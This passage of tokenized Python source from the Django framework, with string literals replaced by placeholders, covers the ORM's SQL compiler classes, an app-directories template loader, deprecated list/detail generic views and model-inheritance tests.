. rel . to . _meta . db_table <EOL> promote = nullable or f . null <EOL> if model : <EOL> int_opts = opts <EOL> alias = root_alias <EOL> alias_chain = [ ] <EOL> for int_model in opts . get_base_chain ( model ) : <EOL> if not int_opts . parents [ int_model ] : <EOL> int_opts = int_model . _meta <EOL> continue <EOL> lhs_col = int_opts . parents [ int_model ] . column <EOL> dedupe = lhs_col in opts . duplicate_targets <EOL> if dedupe : <EOL> avoid . update ( self . query . dupe_avoidance . get ( ( id ( opts ) , lhs_col ) , <EOL> ( ) ) ) <EOL> dupe_set . add ( ( opts , lhs_col ) ) <EOL> int_opts = int_model . _meta <EOL> alias = self . query . join ( ( alias , int_opts . db_table , lhs_col , <EOL> int_opts . pk . column ) , exclusions = used , <EOL> promote = promote ) <EOL> alias_chain . append ( alias ) <EOL> for ( dupe_opts , dupe_col ) in dupe_set : <EOL> self . query . update_dupe_avoidance ( dupe_opts , dupe_col , alias ) <EOL> if self . query . alias_map [ root_alias ] [ JOIN_TYPE ] == self . query . LOUTER : <EOL> self . query . promote_alias_chain ( alias_chain , True ) <EOL> else : <EOL> alias = root_alias <EOL> dedupe = f . column in opts . duplicate_targets <EOL> if dupe_set or dedupe : <EOL> avoid . update ( self . query . dupe_avoidance . get ( ( id ( opts ) , f . column ) , ( ) ) ) <EOL> if dedupe : <EOL> dupe_set . add ( ( opts , f . column ) ) <EOL> alias = self . query . join ( ( alias , table , f . column , <EOL> f . rel . get_related_field ( ) . column ) , <EOL> exclusions = used . union ( avoid ) , promote = promote ) <EOL> used . add ( alias ) <EOL> columns , aliases = self . get_default_columns ( start_alias = alias , <EOL> opts = f . rel . to . _meta , as_pairs = True ) <EOL> self . query . related_select_cols . extend ( columns ) <EOL> if self . query . alias_map [ alias ] [ JOIN_TYPE ] == self . query . LOUTER : <EOL> self . query . promote_alias_chain ( aliases , True ) <EOL> self . query . related_select_fields . extend ( f . rel . to . _meta . fields ) <EOL> if restricted : <EOL> next = requested . get ( f . name , { } ) <EOL> else : <EOL> next = False <EOL> new_nullable = f . null or promote <EOL> for dupe_opts , dupe_col in dupe_set : <EOL> self . query . update_dupe_avoidance ( dupe_opts , dupe_col , alias ) <EOL> self . fill_related_selections ( f . rel . to . _meta , alias , cur_depth + <NUM_LIT:1> , <EOL> used , next , restricted , new_nullable , dupe_set , avoid ) <EOL> if restricted : <EOL> related_fields = [ <EOL> ( o . field , o . model ) <EOL> for o in opts . get_all_related_objects ( ) <EOL> if o . field . unique <EOL> ] <EOL> for f , model in related_fields : <EOL> if not select_related_descend ( f , restricted , requested , reverse = True ) : <EOL> continue <EOL> avoid = avoid_set . copy ( ) <EOL> dupe_set = orig_dupe_set . copy ( ) <EOL> table = model . _meta . db_table <EOL> int_opts = opts <EOL> alias = root_alias <EOL> alias_chain = [ ] <EOL> chain = opts . get_base_chain ( f . rel . to ) <EOL> if chain is not None : <EOL> for int_model in chain : <EOL> if not int_opts . parents [ int_model ] : <EOL> int_opts = int_model . _meta <EOL> continue <EOL> lhs_col = int_opts . parents [ int_model ] . column <EOL> dedupe = lhs_col in opts . duplicate_targets <EOL> if dedupe : <EOL> avoid . update ( ( self . query . dupe_avoidance . get ( id ( opts ) , lhs_col ) , <EOL> ( ) ) ) <EOL> dupe_set . add ( ( opts , lhs_col ) ) <EOL> int_opts = int_model . _meta <EOL> alias = self . query . join ( <EOL> ( alias , int_opts . db_table , lhs_col , int_opts . pk . column ) , <EOL> exclusions = used , promote = True , reuse = used <EOL> ) <EOL> alias_chain . append ( alias ) <EOL> for dupe_opts , dupe_col in dupe_set : <EOL> self . query . update_dupe_avoidance ( dupe_opts , dupe_col , alias ) <EOL> dedupe = f . column in opts . duplicate_targets <EOL> if dupe_set or dedupe : <EOL> avoid . update ( self . query . dupe_avoidance . get ( ( id ( opts ) , f . column ) , ( ) ) ) <EOL> if dedupe : <EOL> dupe_set . add ( ( opts , f . column ) ) <EOL> alias = self . query . join ( <EOL> ( alias , table , f . rel . get_related_field ( ) . column , f . column ) , <EOL> exclusions = used . union ( avoid ) , <EOL> promote = True <EOL> ) <EOL> used . add ( alias ) <EOL> columns , aliases = self . get_default_columns ( start_alias = alias , <EOL> opts = model . _meta , as_pairs = True , local_only = True ) <EOL> self . query . related_select_cols . extend ( columns ) <EOL> self . query . related_select_fields . extend ( model . _meta . fields ) <EOL> next = requested . get ( f . related_query_name ( ) , { } ) <EOL> new_nullable = f . null or None <EOL> self . fill_related_selections ( model . _meta , table , cur_depth + <NUM_LIT:1> , <EOL> used , next , restricted , new_nullable ) <EOL> def deferred_to_columns ( self ) : <EOL> """<STR_LIT>""" <EOL> columns = { } <EOL> self . query . deferred_to_data ( columns , self . query . deferred_to_columns_cb ) <EOL> return columns <EOL> def results_iter ( self ) : <EOL> """<STR_LIT>""" <EOL> resolve_columns = hasattr ( self , '<STR_LIT>' ) <EOL> fields = None <EOL> has_aggregate_select = bool ( self . query . aggregate_select ) <EOL> for rows in self . execute_sql ( MULTI ) : <EOL> for row in rows : <EOL> if resolve_columns : <EOL> if fields is None : <EOL> if self . query . select_fields : <EOL> fields = self . query . select_fields + self . query . related_select_fields <EOL> else : <EOL> fields = self . query . model . _meta . fields <EOL> only_load = self . deferred_to_columns ( ) <EOL> if only_load : <EOL> db_table = self . query . model . _meta . db_table <EOL> fields = [ f for f in fields if db_table in only_load and <EOL> f . column in only_load [ db_table ] ] <EOL> row = self . resolve_columns ( row , fields ) <EOL> if has_aggregate_select : <EOL> aggregate_start = len ( self . query . extra_select . keys ( ) ) + len ( self . query . select ) <EOL> aggregate_end = aggregate_start + len ( self . query . aggregate_select ) <EOL> row = tuple ( row [ : aggregate_start ] ) + tuple ( [ <EOL> self . query . resolve_aggregate ( value , aggregate , self . connection ) <EOL> for ( alias , aggregate ) , value <EOL> in zip ( self . query . aggregate_select . items ( ) , row [ aggregate_start : aggregate_end ] ) <EOL> ] ) + tuple ( row [ aggregate_end : ] ) <EOL> yield row <EOL> def execute_sql ( self , result_type = MULTI ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> sql , params = self . as_sql ( ) <EOL> if not sql : <EOL> raise EmptyResultSet <EOL> except EmptyResultSet : <EOL> if result_type == MULTI : <EOL> return empty_iter ( ) <EOL> else : <EOL> return <EOL> cursor = self . connection . cursor ( ) <EOL> cursor . execute ( sql , params ) <EOL> if not result_type : <EOL> return cursor <EOL> if result_type == SINGLE : <EOL> if self . query . ordering_aliases : <EOL> return cursor . fetchone ( ) [ : - len ( self . query . ordering_aliases ) ] <EOL> return cursor . fetchone ( ) <EOL> if self . query . ordering_aliases : <EOL> result = order_modified_iter ( cursor , len ( self . query . ordering_aliases ) , <EOL> self . connection . features . empty_fetchmany_value ) <EOL> else : <EOL> result = iter ( ( lambda : cursor . fetchmany ( GET_ITERATOR_CHUNK_SIZE ) ) , <EOL> self . connection . features . empty_fetchmany_value ) <EOL> if not self . connection . features . can_use_chunked_reads : <EOL> return list ( result ) <EOL> return result <EOL> class SQLInsertCompiler ( SQLCompiler ) : <EOL> def placeholder ( self , field , val ) : <EOL> if field is None : <EOL> return val <EOL> elif hasattr ( field , '<STR_LIT>' ) : <EOL> return field . get_placeholder ( val , self . connection ) <EOL> else : <EOL> return '<STR_LIT:%s>' <EOL> def as_sql ( self ) : <EOL> qn = self . connection . ops . quote_name <EOL> opts = self . query . model . _meta <EOL> result = [ '<STR_LIT>' % qn ( opts . db_table ) ] <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( [ qn ( c ) for c in self . query . columns ] ) ) <EOL> values = [ self . placeholder ( * v ) for v in self . query . values ] <EOL> result . append ( '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( values ) ) <EOL> params = self . query . params <EOL> if self . return_id and self . connection . features . can_return_id_from_insert : <EOL> col = "<STR_LIT>" % ( qn ( opts . db_table ) , qn ( opts . pk . column ) ) <EOL> r_fmt , r_params = self . connection . ops . return_insert_id ( ) <EOL> result . append ( r_fmt % col ) <EOL> params = params + r_params <EOL> return '<STR_LIT:U+0020>' . join ( result ) , params <EOL> def execute_sql ( self , return_id = False ) : <EOL> self . return_id = return_id <EOL> cursor = super ( SQLInsertCompiler , self ) . execute_sql ( None ) <EOL> if not ( return_id and cursor ) : <EOL> return <EOL> if self . connection . features . can_return_id_from_insert : <EOL> return self . connection . ops . fetch_returned_insert_id ( cursor ) <EOL> return self . connection . ops . last_insert_id ( cursor , <EOL> self . query . model . _meta . db_table , self . query . model . _meta . pk . column ) <EOL> class SQLDeleteCompiler ( SQLCompiler ) : <EOL> def as_sql ( self ) : <EOL> """<STR_LIT>""" <EOL> assert len ( self . query . tables ) == <NUM_LIT:1> , "<STR_LIT>" <EOL> qn = self . quote_name_unless_alias <EOL> result = [ '<STR_LIT>' % qn ( self . query . tables [ <NUM_LIT:0> ] ) ] <EOL> where , params = self . query . where . as_sql ( qn = qn , connection = self . connection ) <EOL> result . append ( '<STR_LIT>' % where ) <EOL> return '<STR_LIT:U+0020>' . join ( result ) , tuple ( params ) <EOL> class SQLUpdateCompiler ( SQLCompiler ) : <EOL> def as_sql ( self ) : <EOL> """<STR_LIT>""" <EOL> from django . db . models . base import Model <EOL> self . pre_sql_setup ( ) <EOL> if not self . query . values : <EOL> return '<STR_LIT>' , ( ) <EOL> table = self . query . tables [ <NUM_LIT:0> ] <EOL> qn = self . quote_name_unless_alias <EOL> result = [ '<STR_LIT>' % qn ( table ) ] <EOL> result . append ( '<STR_LIT>' ) <EOL> values , update_params = [ ] , [ ] <EOL> for field , model , val in self . query . values : <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> val = val . prepare_database_save ( field ) <EOL> else : <EOL> val = field . get_db_prep_save ( val , connection = self . connection ) <EOL> if hasattr ( field , '<STR_LIT>' ) : <EOL> placeholder = field . get_placeholder ( val , self . connection ) <EOL> else : <EOL> placeholder = '<STR_LIT:%s>' <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> val = SQLEvaluator ( val , self . query , allow_joins = False ) <EOL> name = field . column <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> sql , params = val . as_sql ( qn , self . connection ) <EOL> values . append ( '<STR_LIT>' % ( qn ( name ) , sql ) ) <EOL> update_params . extend ( params ) <EOL> elif val is not None : <EOL> values . append ( '<STR_LIT>' % ( qn ( name ) , placeholder ) ) <EOL> update_params . append ( val ) <EOL> else : <EOL> values . append ( '<STR_LIT>' % qn ( name ) ) <EOL> if not values : <EOL> return '<STR_LIT>' , ( ) <EOL> result . append ( '<STR_LIT:U+002CU+0020>' . join ( values ) ) <EOL> where , params = self . query . where . as_sql ( qn = qn , connection = self . connection ) <EOL> if where : <EOL> result . append ( '<STR_LIT>' % where ) <EOL> return '<STR_LIT:U+0020>' . join ( result ) , tuple ( update_params + params ) <EOL> def execute_sql ( self , result_type ) : <EOL> """<STR_LIT>""" <EOL> cursor = super ( SQLUpdateCompiler , self ) . execute_sql ( result_type ) <EOL> rows = cursor and cursor . rowcount or <NUM_LIT:0> <EOL> is_empty = cursor is None <EOL> del cursor <EOL> for query in self . query . get_related_updates ( ) : <EOL> aux_rows = query . get_compiler ( self . using ) . execute_sql ( result_type ) <EOL> if is_empty : <EOL> rows = aux_rows <EOL> is_empty = False <EOL> return rows <EOL> def pre_sql_setup ( self ) : <EOL> """<STR_LIT>""" <EOL> self . query . select_related = False <EOL> self . query . clear_ordering ( True ) <EOL> super ( SQLUpdateCompiler , self ) . pre_sql_setup ( ) <EOL> count = self . query . count_active_tables ( ) <EOL> if not self . query . related_updates and count == <NUM_LIT:1> : <EOL> return <EOL> query = self . query . clone ( klass = Query ) <EOL> query . bump_prefix ( ) <EOL> query . extra = { } <EOL> query . select = [ ] <EOL> query . add_fields ( [ query . model . _meta . pk . name ] ) <EOL> must_pre_select = count > <NUM_LIT:1> and not self . connection . features . update_can_self_select <EOL> self . query . where = self . query . where_class ( ) <EOL> if self . query . related_updates or must_pre_select : <EOL> idents = [ ] <EOL> for rows in query . get_compiler ( self . using ) . execute_sql ( MULTI ) : <EOL> idents . extend ( [ r [ <NUM_LIT:0> ] for r in rows ] ) <EOL> self . query . add_filter ( ( '<STR_LIT>' , idents ) ) <EOL> self . query . related_ids = idents <EOL> else : <EOL> self . query . add_filter ( ( '<STR_LIT>' , query ) ) <EOL> for alias in self . query . tables [ <NUM_LIT:1> : ] : <EOL> self . query . alias_refcount [ alias ] = <NUM_LIT:0> <EOL> class SQLAggregateCompiler ( SQLCompiler ) : <EOL> def as_sql ( self , qn = None ) : <EOL> """<STR_LIT>""" <EOL> if qn is None : <EOL> qn = self . quote_name_unless_alias <EOL> sql = ( '<STR_LIT>' % ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ <EOL> aggregate . as_sql ( qn , self . connection ) <EOL> for aggregate in self . query . aggregate_select . values ( ) <EOL> ] ) , <EOL> self . query . subquery ) <EOL> ) <EOL> params = self . query . sub_params <EOL> return ( sql , params ) <EOL> class SQLDateCompiler ( SQLCompiler ) : <EOL> def results_iter ( self ) : <EOL> """<STR_LIT>""" <EOL> resolve_columns = hasattr ( self , '<STR_LIT>' ) <EOL> if resolve_columns : <EOL> from django . db . models . fields import DateTimeField <EOL> fields = [ DateTimeField ( ) ] <EOL> else : <EOL> from django . db . backends . util import typecast_timestamp <EOL> needs_string_cast = self . connection . features . needs_datetime_string_cast <EOL> offset = len ( self . query . extra_select ) <EOL> for rows in self . execute_sql ( MULTI ) : <EOL> for row in rows : <EOL> date = row [ offset ] <EOL> if resolve_columns : <EOL> date = self . resolve_columns ( row , fields ) [ offset ] <EOL> elif needs_string_cast : <EOL> date = typecast_timestamp ( str ( date ) ) <EOL> yield date <EOL> def empty_iter ( ) : <EOL> """<STR_LIT>""" <EOL> yield iter ( [ ] ) . next ( ) <EOL> def order_modified_iter ( cursor , trim , sentinel ) : <EOL> """<STR_LIT>""" <EOL> for rows in iter ( ( lambda : cursor . fetchmany ( GET_ITERATOR_CHUNK_SIZE ) ) , <EOL> sentinel ) : <EOL> yield [ r [ : - trim ] for r in rows ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from django . conf import settings <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . template . base import TemplateDoesNotExist <EOL> from django . template . loader import BaseLoader <EOL> from django . utils . _os import safe_join <EOL> from django . utils . importlib import import_module <EOL> fs_encoding = sys . getfilesystemencoding ( ) or sys . getdefaultencoding ( ) <EOL> app_template_dirs = [ ] <EOL> for app in settings . INSTALLED_APPS : <EOL> try : <EOL> mod = import_module ( app ) <EOL> except ImportError , e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % ( app , e . args [ <NUM_LIT:0> ] ) ) <EOL> template_dir = os . path . join ( os . path . dirname ( mod . __file__ ) , '<STR_LIT>' ) <EOL> if os . path . isdir ( template_dir ) : <EOL> app_template_dirs . append ( template_dir . decode ( fs_encoding ) ) <EOL> app_template_dirs = tuple ( app_template_dirs ) <EOL> class Loader ( BaseLoader ) : <EOL> is_usable = True <EOL> def get_template_sources ( self , template_name , template_dirs = None ) : <EOL> """<STR_LIT>""" <EOL> if not template_dirs : <EOL> template_dirs = app_template_dirs <EOL> for template_dir in template_dirs : <EOL> try : <EOL> yield safe_join ( template_dir , template_name ) <EOL> except UnicodeDecodeError : <EOL> raise <EOL> except ValueError : <EOL> pass <EOL> def load_template_source ( self , template_name , template_dirs = None ) : <EOL> for filepath in self . get_template_sources ( template_name , template_dirs ) : <EOL> try : <EOL> file = open ( filepath ) <EOL> try : <EOL> return ( file . read ( ) . decode ( settings . FILE_CHARSET ) , filepath ) <EOL> finally : <EOL> file . close ( ) <EOL> except IOError : <EOL> pass <EOL> raise TemplateDoesNotExist ( template_name ) <EOL> _loader = Loader ( ) <EOL> def load_template_source ( template_name , template_dirs = None ) : <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" , <EOL> DeprecationWarning <EOL> ) <EOL> return _loader . load_template_source ( template_name , template_dirs ) <EOL> load_template_source . is_usable = True </s>
<s> from django . template import loader , RequestContext <EOL> from django . http import Http404 , HttpResponse <EOL> from django . core . xheaders import populate_xheaders <EOL> from django . core . paginator import Paginator , InvalidPage <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> import warnings <EOL> warnings . warn ( <EOL> '<STR_LIT>' , <EOL> PendingDeprecationWarning <EOL> ) <EOL> def object_list ( request , queryset , paginate_by = None , page = None , <EOL> allow_empty = True , template_name = None , template_loader = loader , <EOL> extra_context = None , context_processors = None , template_object_name = '<STR_LIT:object>' , <EOL> mimetype = None ) : <EOL> """<STR_LIT>""" <EOL> if extra_context is None : extra_context = { } <EOL> queryset = queryset . _clone ( ) <EOL> if paginate_by : <EOL> paginator = Paginator ( queryset , paginate_by , allow_empty_first_page = allow_empty ) <EOL> if not page : <EOL> page = request . GET . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try : <EOL> page_number = int ( page ) <EOL> except ValueError : <EOL> if page == '<STR_LIT>' : <EOL> page_number = paginator . num_pages <EOL> else : <EOL> raise Http404 <EOL> try : <EOL> page_obj = paginator . page ( page_number ) <EOL> except InvalidPage : <EOL> raise Http404 <EOL> c = RequestContext ( request , { <EOL> '<STR_LIT>' % template_object_name : page_obj . object_list , <EOL> '<STR_LIT>' : paginator , <EOL> '<STR_LIT>' : page_obj , <EOL> '<STR_LIT>' : page_obj . has_other_pages ( ) , <EOL> '<STR_LIT>' : paginator . per_page , <EOL> '<STR_LIT>' : page_obj . has_next ( ) , <EOL> '<STR_LIT>' : page_obj . has_previous ( ) , <EOL> '<STR_LIT>' : page_obj . number , <EOL> '<STR_LIT>' : page_obj . next_page_number ( ) , <EOL> '<STR_LIT>' : page_obj . previous_page_number ( ) , <EOL> '<STR_LIT>' : page_obj . start_index ( ) , <EOL> '<STR_LIT>' : page_obj . end_index ( ) , <EOL> '<STR_LIT>' : paginator . num_pages , <EOL> '<STR_LIT>' : paginator . count , <EOL> '<STR_LIT>' : paginator . page_range , <EOL> } , context_processors ) <EOL> else : <EOL> c = RequestContext ( request , { <EOL> '<STR_LIT>' % template_object_name : queryset , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> } , context_processors ) <EOL> if not allow_empty and len ( queryset ) == <NUM_LIT:0> : <EOL> raise Http404 <EOL> for key , value in extra_context . items ( ) : <EOL> if callable ( value ) : <EOL> c [ key ] = value ( ) <EOL> else : <EOL> c [ key ] = value <EOL> if not template_name : <EOL> model = queryset . model <EOL> template_name = "<STR_LIT>" % ( model . _meta . app_label , model . _meta . object_name . lower ( ) ) <EOL> t = template_loader . get_template ( template_name ) <EOL> return HttpResponse ( t . render ( c ) , mimetype = mimetype ) <EOL> def object_detail ( request , queryset , object_id = None , slug = None , <EOL> slug_field = '<STR_LIT>' , template_name = None , template_name_field = None , <EOL> template_loader = loader , extra_context = None , <EOL> context_processors = None , template_object_name = '<STR_LIT:object>' , <EOL> mimetype = None ) : <EOL> """<STR_LIT>""" <EOL> if extra_context is None : extra_context = { } <EOL> model = queryset . model <EOL> if object_id : <EOL> queryset = queryset . filter ( pk = object_id ) <EOL> elif slug and slug_field : <EOL> queryset = queryset . filter ( ** { slug_field : slug } ) <EOL> else : <EOL> raise AttributeError ( "<STR_LIT>" ) <EOL> try : <EOL> obj = queryset . get ( ) <EOL> except ObjectDoesNotExist : <EOL> raise Http404 ( "<STR_LIT>" % ( model . _meta . verbose_name ) ) <EOL> if not template_name : <EOL> template_name = "<STR_LIT>" % ( model . _meta . app_label , model . _meta . object_name . lower ( ) ) <EOL> if template_name_field : <EOL> template_name_list = [ getattr ( obj , template_name_field ) , template_name ] <EOL> t = template_loader . select_template ( template_name_list ) <EOL> else : <EOL> t = template_loader . get_template ( template_name ) <EOL> c = RequestContext ( request , { <EOL> template_object_name : obj , <EOL> } , context_processors ) <EOL> for key , value in extra_context . items ( ) : <EOL> if callable ( value ) : <EOL> c [ key ] = value ( ) <EOL> else : <EOL> c [ key ] = value <EOL> response = HttpResponse ( t . render ( c ) , mimetype = mimetype ) <EOL> populate_xheaders ( request , response , model , getattr ( obj , obj . _meta . pk . name ) ) <EOL> return response </s>
<s> from operator import attrgetter <EOL> from django . core . exceptions import FieldError <EOL> from django . test import TestCase <EOL> from models import ( Chef , CommonInfo , ItalianRestaurant , ParkingLot , Place , <EOL> Post , Restaurant , Student , StudentWorker , Supplier , Worker , MixinModel ) <EOL> class ModelInheritanceTests ( TestCase ) : <EOL> def test_abstract ( self ) : <EOL> w1 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> w2 = Worker . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT> , job = "<STR_LIT>" ) <EOL> s = Student . objects . create ( name = "<STR_LIT>" , age = <NUM_LIT:5> , school_class = "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( w1 ) , "<STR_LIT>" ) <EOL> self . assertEqual ( unicode ( s ) , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> Worker . objects . values ( "<STR_LIT:name>" ) , [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" } , <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertEqual ( Student . _meta . ordering , [ ] ) <EOL> self . assertRaises ( AttributeError , lambda : CommonInfo . objects . all ( ) ) <EOL> self . assertRaises ( Student . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> self . assertRaises ( Worker . DoesNotExist , <EOL> StudentWorker . objects . get , pk = <NUM_LIT> <EOL> ) <EOL> sw1 = StudentWorker ( ) <EOL> sw1 . name = "<STR_LIT>" <EOL> sw1 . age = <NUM_LIT> <EOL> sw1 . save ( ) <EOL> sw2 = StudentWorker ( ) <EOL> sw2 . name = "<STR_LIT>" <EOL> sw2 . age = <NUM_LIT> <EOL> sw2 . save ( ) <EOL> self . assertRaises ( Student . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . pk + <NUM_LIT:100> <EOL> ) <EOL> self . assertRaises ( Worker . MultipleObjectsReturned , <EOL> StudentWorker . objects . get , pk__lt = sw2 . pk + <NUM_LIT:100> <EOL> ) <EOL> def test_multiple_table ( self ) : <EOL> post = Post . objects . create ( title = "<STR_LIT>" ) <EOL> post . attached_comment_set . create ( content = "<STR_LIT>" , is_spam = True ) <EOL> post . attached_link_set . create ( <EOL> content = "<STR_LIT>" , <EOL> url = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( AttributeError , <EOL> getattr , post , "<STR_LIT>" <EOL> ) <EOL> p1 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> p2 = Place . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> r = Restaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = True , <EOL> serves_pizza = False , <EOL> rating = <NUM_LIT:2> <EOL> ) <EOL> c = Chef . objects . create ( name = "<STR_LIT>" ) <EOL> ir = ItalianRestaurant . objects . create ( <EOL> name = "<STR_LIT>" , <EOL> address = "<STR_LIT>" , <EOL> serves_hot_dogs = False , <EOL> serves_pizza = False , <EOL> serves_gnocchi = True , <EOL> rating = <NUM_LIT:4> , <EOL> chef = c <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> ir . address = "<STR_LIT>" <EOL> ir . save ( ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in Restaurant . _meta . fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ) <EOL> self . assertEqual ( <EOL> [ f . name for f in ItalianRestaurant . _meta . fields ] , <EOL> [ "<STR_LIT:id>" , "<STR_LIT:name>" , "<STR_LIT:address>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> ) <EOL> self . assertEqual ( Restaurant . _meta . ordering , [ "<STR_LIT>" ] ) <EOL> self . assertQuerysetEqual ( Place . objects . filter ( supplier__name = "<STR_LIT:foo>" ) , [ ] ) <EOL> self . assertRaises ( FieldError , <EOL> Restaurant . objects . filter , supplier__name = "<STR_LIT:foo>" <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( name = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( address = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertIs ( type ( p ) , Place ) <EOL> self . assertEqual ( <EOL> p . restaurant , Restaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Place . objects . get ( name = "<STR_LIT>" ) . restaurant . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( name = "<STR_LIT>" ) . italianrestaurant , <EOL> ItalianRestaurant . objects . get ( name = "<STR_LIT>" ) <EOL> ) <EOL> self . assertRaises ( ItalianRestaurant . DoesNotExist , <EOL> lambda : p . restaurant . italianrestaurant <EOL> ) <EOL> self . assertRaises ( Place . DoesNotExist , <EOL> ItalianRestaurant . objects . get , name = "<STR_LIT>" <EOL> ) <EOL> self . assertRaises ( Place . MultipleObjectsReturned , <EOL> Restaurant . objects . get , id__lt = <NUM_LIT> <EOL> ) <EOL> s1 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s1 . customers = [ r , ir ] <EOL> s2 = Supplier . objects . create ( name = "<STR_LIT>" , address = "<STR_LIT>" ) <EOL> s2 . customers = [ ir ] <EOL> p = Place . objects . get ( name = "<STR_LIT>" ) <EOL> self . assertRaises ( Restaurant . DoesNotExist , <EOL> lambda : p . restaurant <EOL> ) <EOL> self . assertEqual ( p . supplier , s1 ) <EOL> self . assertQuerysetEqual ( <EOL> ir . provider . order_by ( "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Restaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . filter ( provider__name__contains = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> attrgetter ( "<STR_LIT:name>" ) , <EOL> ) <EOL> park1 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = s1 <EOL> ) <EOL> park2 = ParkingLot . objects . create ( <EOL> name = "<STR_LIT>" , address = "<STR_LIT>" , main_site = ir <EOL> ) <EOL> self . assertEqual ( <EOL> Restaurant . objects . get ( lot__name = "<STR_LIT>" ) . name , <EOL> "<STR_LIT>" <EOL> ) <EOL> rows = Restaurant . objects . filter ( <EOL> serves_hot_dogs = True , name__contains = "<STR_LIT:D>" <EOL> ) . update ( <EOL> name = "<STR_LIT>" , serves_hot_dogs = False <EOL> ) <EOL> self . assertEqual ( rows , <NUM_LIT:1> ) <EOL> r1 = Restaurant . objects . get ( pk = r . pk ) <EOL> self . assertFalse ( r1 . serves_hot_dogs ) <EOL> self . assertEqual ( r1 . name , "<STR_LIT>" ) <EOL> self . assertQuerysetEqual ( <EOL> ItalianRestaurant . objects . values ( "<STR_LIT:name>" , "<STR_LIT>" ) , [ <EOL> { "<STR_LIT>" : <NUM_LIT:4> , "<STR_LIT:name>" : "<STR_LIT>" } <EOL> ] , <EOL> lambda o : o <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:2> , <EOL> lambda : ItalianRestaurant . objects . all ( ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> self . assertNumQueries ( <NUM_LIT:1> , <EOL> lambda : ItalianRestaurant . objects . select_related ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . chef <EOL> ) <EOL> def test_mixin_init ( self ) : <EOL> m = MixinModel ( ) <EOL> self . assertEqual ( m . other_attr , <NUM_LIT:1> ) </s>
